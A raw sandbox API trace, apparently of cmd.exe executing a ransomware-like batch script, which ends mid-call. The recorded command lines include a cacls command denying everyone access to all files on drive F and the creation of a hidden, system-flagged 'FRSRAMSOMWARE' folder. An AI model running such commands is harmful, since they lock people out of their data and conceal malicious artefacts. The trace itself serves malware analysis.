_wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.797] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.797] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.797] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.797] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.797] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.797] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.797] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"F:\\*.*\" /e /d everyone", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"F:\\*.*\" /e /d everyone", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="cacls \"F:\\*.*\" /e /d everyone", lpProcessInformation=0xc8ee4c*(hProcess=0x80, hThread=0x94, dwProcessId=0x6b0, dwThreadId=0x72c)) returned 1 [0036.799] CloseHandle (hObject=0x94) returned 1 [0036.800] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.800] GetEnvironmentStringsW () returned 0xd1b190* [0036.800] FreeEnvironmentStringsA (penv="=") returned 1 [0036.800] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0036.800] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0036.800] _close (_FileHandle=4) returned 0 [0036.800] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0xffffffff) returned 0x0 [0036.881] GetExitCodeProcess (in: hProcess=0x8c, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0036.881] CloseHandle (hObject=0x8c) returned 1 [0036.881] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0036.883] GetExitCodeProcess (in: hProcess=0x80, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x3) returned 1 [0036.883] CloseHandle (hObject=0x80) returned 1 [0036.883] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.883] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0036.883] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.883] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0036.883] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.883] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.883] SetConsoleInputExeNameW () returned 0x1 [0036.883] GetConsoleOutputCP () returned 0x1b5 [0036.884] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.884] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.884] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0036.884] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0036.884] _get_osfhandle (_FileHandle=3) returned 0x80 [0036.884] SetFilePointer (in: hFile=0x80, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0036.884] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0036.884] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x553, lpOverlapped=0x0) returned 1 [0036.885] SetFilePointer (in: hFile=0x80, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0036.885] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n /d everyone\r\nd everyone\r\n\n\r\n=%%i\r\n") returned 8 [0036.885] GetFileType (hFile=0x80) returned 0x1 [0036.885] _get_osfhandle (_FileHandle=3) returned 0x80 [0036.885] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0036.885] _wcsicmp (_String1="goto", _String2=")") returned 62 [0036.885] _wcsicmp (_String1="FOR", _String2="goto") returned -1 [0036.885] _wcsicmp (_String1="FOR/?", _String2="goto") returned -1 [0036.885] _wcsicmp (_String1="IF", _String2="goto") returned 2 [0036.885] _wcsicmp (_String1="IF/?", _String2="goto") returned 2 [0036.885] _wcsicmp (_String1="REM", _String2="goto") returned 11 [0036.885] _wcsicmp (_String1="REM/?", _String2="goto") returned 11 [0036.885] _tell (_FileHandle=3) returned 1315 [0036.885] _close (_FileHandle=3) returned 0 [0036.885] _wcsicmp (_String1="goto", _String2="DIR") returned 3 [0036.885] _wcsicmp (_String1="goto", _String2="ERASE") returned 2 [0036.885] _wcsicmp (_String1="goto", _String2="DEL") returned 3 [0036.885] _wcsicmp (_String1="goto", _String2="TYPE") returned -13 [0036.885] _wcsicmp (_String1="goto", _String2="COPY") returned 4 [0036.885] _wcsicmp (_String1="goto", _String2="CD") returned 4 [0036.885] _wcsicmp (_String1="goto", _String2="CHDIR") returned 4 [0036.885] _wcsicmp (_String1="goto", _String2="RENAME") returned -11 [0036.885] _wcsicmp (_String1="goto", _String2="REN") returned -11 [0036.885] _wcsicmp (_String1="goto", _String2="ECHO") returned 2 [0036.885] _wcsicmp (_String1="goto", _String2="SET") returned -12 [0036.885] _wcsicmp (_String1="goto", _String2="PAUSE") returned -9 [0036.885] _wcsicmp (_String1="goto", _String2="DATE") returned 3 [0036.885] _wcsicmp (_String1="goto", _String2="TIME") returned -13 [0036.885] _wcsicmp (_String1="goto", _String2="PROMPT") returned -9 [0036.885] _wcsicmp (_String1="goto", _String2="MD") returned -6 [0036.885] _wcsicmp (_String1="goto", _String2="MKDIR") returned -6 [0036.885] _wcsicmp (_String1="goto", _String2="RD") returned -11 [0036.885] _wcsicmp (_String1="goto", _String2="RMDIR") returned -11 [0036.885] _wcsicmp (_String1="goto", _String2="PATH") returned -9 [0036.885] _wcsicmp (_String1="goto", _String2="GOTO") returned 0 [0036.885] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.886] _wcsicmp (_String1="goto", _String2="DIR") returned 3 [0036.886] _wcsicmp (_String1="goto", _String2="ERASE") returned 2 [0036.886] _wcsicmp (_String1="goto", _String2="DEL") returned 3 [0036.886] _wcsicmp (_String1="goto", _String2="TYPE") returned -13 [0036.886] _wcsicmp (_String1="goto", _String2="COPY") returned 4 [0036.886] _wcsicmp (_String1="goto", _String2="CD") returned 4 [0036.886] _wcsicmp (_String1="goto", _String2="CHDIR") returned 4 [0036.886] _wcsicmp (_String1="goto", _String2="RENAME") returned -11 [0036.886] _wcsicmp (_String1="goto", _String2="REN") returned -11 [0036.886] _wcsicmp (_String1="goto", _String2="ECHO") returned 2 [0036.886] _wcsicmp (_String1="goto", _String2="SET") returned -12 [0036.886] _wcsicmp (_String1="goto", _String2="PAUSE") returned -9 [0036.886] _wcsicmp (_String1="goto", _String2="DATE") returned 3 [0036.886] _wcsicmp (_String1="goto", _String2="TIME") returned -13 [0036.886] _wcsicmp (_String1="goto", _String2="PROMPT") returned -9 [0036.886] _wcsicmp (_String1="goto", _String2="MD") returned -6 [0036.886] _wcsicmp (_String1="goto", _String2="MKDIR") returned -6 [0036.886] _wcsicmp (_String1="goto", _String2="RD") returned -11 [0036.886] _wcsicmp (_String1="goto", _String2="RMDIR") returned -11 [0036.886] _wcsicmp (_String1="goto", _String2="PATH") returned -9 [0036.886] _wcsicmp (_String1="goto", _String2="GOTO") returned 0 [0036.886] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8eb00, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0036.886] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0036.886] _get_osfhandle (_FileHandle=3) returned 0x80 [0036.886] SetFilePointer (in: hFile=0x80, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0036.886] _get_osfhandle (_FileHandle=3) returned 0x80 [0036.886] GetFileSize (in: hFile=0x80, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0036.886] _wcsnicmp (_String1="3", _String2=":EOF", _MaxCount=0x4) returned -7 [0036.886] _get_osfhandle (_FileHandle=3) returned 0x80 [0036.886] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0036.886] _get_osfhandle (_FileHandle=3) returned 0x80 [0036.886] GetFileType (hFile=0x80) returned 0x1 [0036.886] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0036.886] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8eb6c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8eb6c*=0x200, lpOverlapped=0x0) returned 1 [0036.886] SetFilePointer (in: hFile=0x80, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0036.887] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\n") returned 2 [0036.887] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0036.887] _get_osfhandle (_FileHandle=3) returned 0x80 [0036.887] GetFileType (hFile=0x80) returned 0x1 [0036.887] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0036.887] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8eb6c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8eb6c*=0x200, lpOverlapped=0x0) returned 1 [0036.887] SetFilePointer (in: hFile=0x80, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0036.887] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n") returned 4 [0036.887] _wcsicmp (_String1="3", _String2="3") returned 0 [0036.887] _close (_FileHandle=3) returned 0 [0036.887] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.887] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0036.887] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.887] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0036.887] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.887] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.887] SetConsoleInputExeNameW () returned 0x1 [0036.887] GetConsoleOutputCP () returned 0x1b5 [0036.888] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.888] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.888] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0036.888] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0036.888] _get_osfhandle (_FileHandle=3) returned 0x80 [0036.888] SetFilePointer (in: hFile=0x80, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0036.888] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0036.888] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x545, lpOverlapped=0x0) returned 1 [0036.888] SetFilePointer (in: hFile=0x80, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0036.888] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n /d everyone\r\nd everyone\r\n\n\r\n=%%i\r\n") returned 21 [0036.888] GetFileType (hFile=0x80) returned 0x1 [0036.888] _get_osfhandle (_FileHandle=3) returned 0x80 [0036.888] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0036.888] _wcsicmp (_String1="md", _String2=")") returned 68 [0036.888] _wcsicmp (_String1="FOR", _String2="md") returned -7 [0036.888] _wcsicmp (_String1="FOR/?", _String2="md") returned -7 [0036.888] _wcsicmp (_String1="IF", _String2="md") returned -4 [0036.888] _wcsicmp (_String1="IF/?", _String2="md") returned -4 [0036.888] _wcsicmp (_String1="REM", _String2="md") returned 5 [0036.888] _wcsicmp (_String1="REM/?", _String2="md") returned 5 [0036.888] _tell (_FileHandle=3) returned 1342 [0036.888] _close (_FileHandle=3) returned 0 [0036.888] _wcsicmp (_String1="md", _String2="DIR") returned 9 [0036.888] _wcsicmp (_String1="md", _String2="ERASE") returned 8 [0036.888] _wcsicmp (_String1="md", _String2="DEL") returned 9 [0036.888] _wcsicmp (_String1="md", _String2="TYPE") returned -7 [0036.888] _wcsicmp (_String1="md", _String2="COPY") returned 10 [0036.888] _wcsicmp (_String1="md", _String2="CD") returned 10 [0036.889] _wcsicmp (_String1="md", _String2="CHDIR") returned 10 [0036.889] _wcsicmp (_String1="md", _String2="RENAME") returned -5 [0036.889] _wcsicmp (_String1="md", _String2="REN") returned -5 [0036.889] _wcsicmp (_String1="md", _String2="ECHO") returned 8 [0036.889] _wcsicmp (_String1="md", _String2="SET") returned -6 [0036.889] _wcsicmp (_String1="md", _String2="PAUSE") returned -3 [0036.889] _wcsicmp (_String1="md", _String2="DATE") returned 9 [0036.889] _wcsicmp (_String1="md", _String2="TIME") returned -7 [0036.889] _wcsicmp (_String1="md", _String2="PROMPT") returned -3 [0036.889] _wcsicmp (_String1="md", _String2="MD") returned 0 [0036.889] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.889] _wcsicmp (_String1="md", _String2="DIR") returned 9 [0036.889] _wcsicmp (_String1="md", _String2="ERASE") returned 8 [0036.889] _wcsicmp (_String1="md", _String2="DEL") returned 9 [0036.889] _wcsicmp (_String1="md", _String2="TYPE") returned -7 [0036.889] _wcsicmp (_String1="md", _String2="COPY") returned 10 [0036.889] _wcsicmp (_String1="md", _String2="CD") returned 10 [0036.889] _wcsicmp (_String1="md", _String2="CHDIR") returned 10 [0036.889] _wcsicmp (_String1="md", _String2="RENAME") returned -5 [0036.889] _wcsicmp (_String1="md", _String2="REN") returned -5 [0036.889] _wcsicmp (_String1="md", _String2="ECHO") returned 8 [0036.889] _wcsicmp (_String1="md", _String2="SET") returned -6 [0036.889] _wcsicmp (_String1="md", _String2="PAUSE") returned -3 [0036.889] _wcsicmp (_String1="md", _String2="DATE") returned 9 [0036.889] _wcsicmp (_String1="md", _String2="TIME") returned -7 [0036.889] _wcsicmp (_String1="md", _String2="PROMPT") returned -3 [0036.889] _wcsicmp (_String1="md", _String2="MD") returned 0 [0036.889] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.889] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.889] GetFullPathNameW (in: lpFileName="C:\\FRSRAMSOMWARE", nBufferLength=0x104, lpBuffer=0xc8e6a0, lpFilePart=0xc8e69c | out: lpBuffer="C:\\FRSRAMSOMWARE", lpFilePart=0xc8e69c*="FRSRAMSOMWARE") returned 0x10 [0036.889] CreateDirectoryW (lpPathName="C:\\FRSRAMSOMWARE" (normalized: "c:\\frsramsomware"), lpSecurityAttributes=0x0) returned 1 [0036.890] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.890] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0036.890] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.890] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0036.890] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.890] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.890] SetConsoleInputExeNameW () returned 0x1 [0036.890] GetConsoleOutputCP () returned 0x1b5 [0036.890] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.890] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.890] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0036.890] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0036.891] _get_osfhandle (_FileHandle=3) returned 0x80 [0036.891] SetFilePointer (in: hFile=0x80, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0036.891] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0036.891] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x530, lpOverlapped=0x0) returned 1 [0036.891] SetFilePointer (in: hFile=0x80, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0036.891] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n /d everyone\r\nd everyone\r\n\n\r\n=%%i\r\n") returned 37 [0036.891] GetFileType (hFile=0x80) returned 0x1 [0036.891] _get_osfhandle (_FileHandle=3) returned 0x80 [0036.891] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0036.891] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0036.891] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0036.891] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0036.891] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0036.891] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0036.891] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0036.891] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0036.891] _tell (_FileHandle=3) returned 1379 [0036.891] _close (_FileHandle=3) returned 0 [0036.891] _wcsicmp (_String1="attrib", _String2="DIR") returned -3 [0036.891] _wcsicmp (_String1="attrib", _String2="ERASE") returned -4 [0036.891] _wcsicmp (_String1="attrib", _String2="DEL") returned -3 [0036.891] _wcsicmp (_String1="attrib", _String2="TYPE") returned -19 [0036.891] _wcsicmp (_String1="attrib", _String2="COPY") returned -2 [0036.891] _wcsicmp (_String1="attrib", _String2="CD") returned -2 [0036.891] _wcsicmp (_String1="attrib", _String2="CHDIR") returned -2 [0036.891] _wcsicmp (_String1="attrib", _String2="RENAME") returned -17 [0036.891] _wcsicmp (_String1="attrib", _String2="REN") returned -17 [0036.891] _wcsicmp (_String1="attrib", _String2="ECHO") returned -4 [0036.891] _wcsicmp (_String1="attrib", _String2="SET") returned -18 [0036.891] _wcsicmp (_String1="attrib", _String2="PAUSE") returned -15 [0036.891] _wcsicmp (_String1="attrib", _String2="DATE") returned -3 [0036.891] _wcsicmp (_String1="attrib", _String2="TIME") returned -19 [0036.891] _wcsicmp (_String1="attrib", _String2="PROMPT") returned -15 [0036.891] _wcsicmp (_String1="attrib", _String2="MD") returned -12 [0036.891] _wcsicmp (_String1="attrib", _String2="MKDIR") returned -12 [0036.891] _wcsicmp (_String1="attrib", _String2="RD") returned -17 [0036.891] _wcsicmp (_String1="attrib", _String2="RMDIR") returned -17 [0036.891] _wcsicmp (_String1="attrib", _String2="PATH") returned -15 [0036.891] _wcsicmp (_String1="attrib", _String2="GOTO") returned -6 [0036.891] _wcsicmp (_String1="attrib", _String2="SHIFT") returned -18 [0036.891] _wcsicmp (_String1="attrib", _String2="CLS") returned -2 [0036.892] _wcsicmp (_String1="attrib", _String2="CALL") returned -2 [0036.892] _wcsicmp (_String1="attrib", _String2="VERIFY") returned -21 [0036.892] _wcsicmp (_String1="attrib", _String2="VER") returned -21 [0036.892] _wcsicmp (_String1="attrib", _String2="VOL") returned -21 [0036.892] _wcsicmp (_String1="attrib", _String2="EXIT") returned -4 [0036.892] _wcsicmp (_String1="attrib", _String2="SETLOCAL") returned -18 [0036.892] _wcsicmp (_String1="attrib", _String2="ENDLOCAL") returned -4 [0036.892] _wcsicmp (_String1="attrib", _String2="TITLE") returned -19 [0036.892] _wcsicmp (_String1="attrib", _String2="START") returned -18 [0036.892] _wcsicmp (_String1="attrib", _String2="DPATH") returned -3 [0036.892] _wcsicmp (_String1="attrib", _String2="KEYS") returned -10 [0036.892] _wcsicmp (_String1="attrib", _String2="MOVE") returned -12 [0036.892] _wcsicmp (_String1="attrib", _String2="PUSHD") returned -15 [0036.892] _wcsicmp (_String1="attrib", _String2="POPD") returned -15 [0036.892] _wcsicmp (_String1="attrib", _String2="ASSOC") returned 1 [0036.892] _wcsicmp (_String1="attrib", _String2="FTYPE") returned -5 [0036.892] _wcsicmp (_String1="attrib", _String2="BREAK") returned -1 [0036.892] _wcsicmp (_String1="attrib", _String2="COLOR") returned -2 [0036.892] _wcsicmp (_String1="attrib", _String2="MKLINK") returned -12 [0036.892] _wcsnicmp (_String1="attr", _String2="cmd ", _MaxCount=0x4) returned -2 [0036.892] SetErrorMode (uMode=0x0) returned 0x0 [0036.892] SetErrorMode (uMode=0x1) returned 0x0 [0036.892] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd17f78, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0036.892] SetErrorMode (uMode=0x0) returned 0x1 [0036.892] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.892] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.892] GetEnvironmentVariableW (in: lpName="PATHEXT", 